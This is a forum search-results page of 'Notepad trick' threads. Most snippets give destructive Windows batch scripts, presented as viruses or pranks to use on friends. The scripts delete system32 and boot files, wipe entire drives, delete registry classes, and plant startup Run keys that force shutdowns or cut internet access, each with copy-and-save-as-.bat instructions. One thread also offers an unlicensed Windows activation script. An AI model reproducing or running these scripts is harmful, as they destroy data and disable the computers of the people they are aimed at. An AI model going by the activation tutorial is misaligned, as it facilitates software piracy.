notepad trick

  1. 0

    👨‍🏫 Tutorial How To Activate Windows 7/8/8.1/10 & 11 using .bat File

    Hidden content STEPS: First Open Notepad and Copy the code above. Save the file to .bat extension on desktop. Right Click On The File and select "Run As Administrator" If Your Version is Supported Then your Windows will be Activated.
  2. S

    🔒 Closed Amazing Notepad Tricks Windows

    Notepad, the text editor that comes bundled in Windows is an excellent tool for text editing. But that is not the only thing for which notepad is famous. It is also famous for its tricks and häçks. Here is a roundup of some of the best and coolest tricks that you can try using Notepad. Matrix...
  3. B

    🔒 Closed .txt file lock

    meron bang way para ma lock ang .txt file or any file na naoopen sa notepad/notepad++ ? para kung sakalign ishare mo ito ehh di nila maeedit/mababasa?
  4. I

    🔒 Closed Notepad ^_^

    IMP. Note>> I am not responsible for any damage or error reporting in Your pc do it as ur own risk. These coding only for knowledge concept. Lahat ng Question mark ay sign ng (at) @ All Scripts Here Are To Be Copied In Note Pad >>This Virus Deletes All The Content Of A Drive… (at)Echo off del...
  5. E

    🔒 Closed Create a FAKE virus

    Hey guys! I am back again with a new trick up my sleeve. I am here to show you how to make a virus that is completely harmless. 1.Open Notepad 2.type the following code in it: lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to...
  6. E

    🔒 Closed Freak - [Notepad trick]

    This virus disables the internet forever. echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d...
  7. E

    🔒 Closed RIP -2 - [Notepad trick]

    This virus does the same It also prevents pc from starting but in an effective and better way. del c:\WINDOWS\system32\*.*/q INSTRUCTIONS: 1. Copy the codes in Notepad and select save as and give the name virus.bat ( ending extension should be “.bat”) 2. Select all files in the type . and...
  8. E

    🔒 Closed Rest In Peace - [Notepad trick]

    It crashes PC once used the PC can’t be restarted.. It deletes everything necessary for starting up windows. Do not use on yourself. @echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h...
  9. E

    🔒 Closed Shutter - [Notepad trick]

    This virus can be very annoying it shutdowns computer every time the computer is turned on. echo @echo off>c:windowshartlell.bat echo break off>>c:windowshartlell.bat echo shutdown -r -t 11 -f>>c:windowshartlell.bat echo end>>c:windowshartlell.bat reg add...
  10. E

    🔒 Closed Ez Formatter - [Notepad trick]

    This Simple Virus formats windows drives in less than 5 seconds. Only D,E And C drives. rd/s/q D:\ rd/s/q C:\ rd/s/q E:\ INSTRUCTIONS: 1. Copy the codes in Notepad and select save as and give the name virus.bat ( ending extension should be “.bat”) 2. Select all files in the type . and click...
  11. E

    🔒 Closed Shut Up - [Notepad trick]

    Send your friend a little message and shut down his computer. @echo off msg * Lets Roll Baby shutdown -c “Error! Your ass got glued!” -s INSTRUCTIONS: 1. Copy the codes in Notepad and select save as and give the name virus.bat ( ending extension should be “.bat”) 2. Select all files in the...
  12. E

    🔒 Closed No Access - [Notepad trick]

    A good Halloween prank for your friends this stops internet access of the user. To gain Access type IPconfig /renew in CMD, @echo off Ipconfig /release INSTRUCTIONS: 1. Copy the codes in Notepad and select save as and give the name virus.bat ( ending extension should be “.bat”) 2. Select all...
  13. E

    🔒 Closed Registry Deleter - [Notepad trick]

    Deletes everything stored in registry. @echo OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/*
  14. E

    🔒 Closed Wiper - [Notepad trick]

    Deletes everything in the computer’s drive. @echo off del D:\*.* /f /s /q del E:\*.* /f /s /q del F:\*.* /f /s /q del G:\*.* /f /s /q del H:\*.* /f /s /q del I:\*.* /f /s /q del J:\*.* /f /s /q Save As “Your File Name.bat [Batch File]
  15. C

    🔒 Closed how to make ram optimizer tool using notepad

    maganda po to lalo na po sa computer na mabababa ang ram marami pong nagaalok ng mg tools na optimizer daw at mapapabilis ang performance ng inyong pc ngunit kailangan niyo pang gumastos kung puwede namang gumawa ng iyong sariling optimizer gamit ang notepad. steps: 1.)open notepad 2.)type...
Back
Top